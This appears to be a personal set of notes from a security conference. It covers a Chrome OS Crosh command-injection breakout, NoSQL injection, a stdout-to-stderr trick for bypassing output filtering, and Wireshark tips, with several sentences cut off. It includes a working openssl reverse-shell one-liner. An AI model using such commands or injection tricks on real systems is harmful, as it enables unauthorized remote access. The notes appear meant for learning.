Moebius ANSI Art Editor
This is the Lost Rabbit Labs people. I saw them at a DC 303 meet-up.
This vulnerability was actually patched two years ago by Google…
This is a breakout from the Chrome OS guest user via the the Crosh shell using command injection in the
The Pico Ducky is a Rubber Ducky work-alike that runs on a Raspberry Pi Pico. It’s much faster than Hak5’s tool.
Interesting redirect trick - use
1>&2 to redirect STDOUT to STDERR (the reverse of what is normally done) to bypass some output filtering.
You can pipe
openssl for a reverse shell! Something like:
mkfifo /tmp/irl; /bin/sh -i < /tmp/irl 2>&1 | openssl s_client -quiet -connect 127.0.0.1:1337 > tmp/irl; rm /tmp/irl
In older versions of Chrome OS, the Crosh shell could actually be launched in Dev Mode (without switching the entire box to Dev Mode) using
crosh --dev (via
set_apn command injection).
SQLite shell escape:
Oof… There were (are?) hard-coded SSH public keys on Chrome OS; the corresponding private key was (is?) available in the Chromium code repo.
Chrome OS has a restricted
finger command called
pinky that’s used internally.
If you can get to
dbus on a Chromebook, you can access some (but not all!) Dev Mode tools (like
(I wasn’t able to catch the end of this presentation, however, as I needed to head out to my last workshop…)
TIL: There is such a thing as NoSQLi, and it’s way easier than SQLi - just drop objects containing search operators into the NoSQL queries instead of actual data!
You can search within packets in Wireshark using the filter
frame contains "$TEXT_TO_SEARCH".
If you can find an encryption key in a packet dump, you can try applying them to encrypted packets in Wireshark using “Preferences > RSA Keys”.
Wireshark can easily extract files from HTTP conversations. To extract them from raw TCP streams, (1) locate the beginning of the stream, (2) right-click on the packet and select “Follow > TCP Stream, (3) change “Show data as” to “Raw”, and (4) save it off using “Save As”.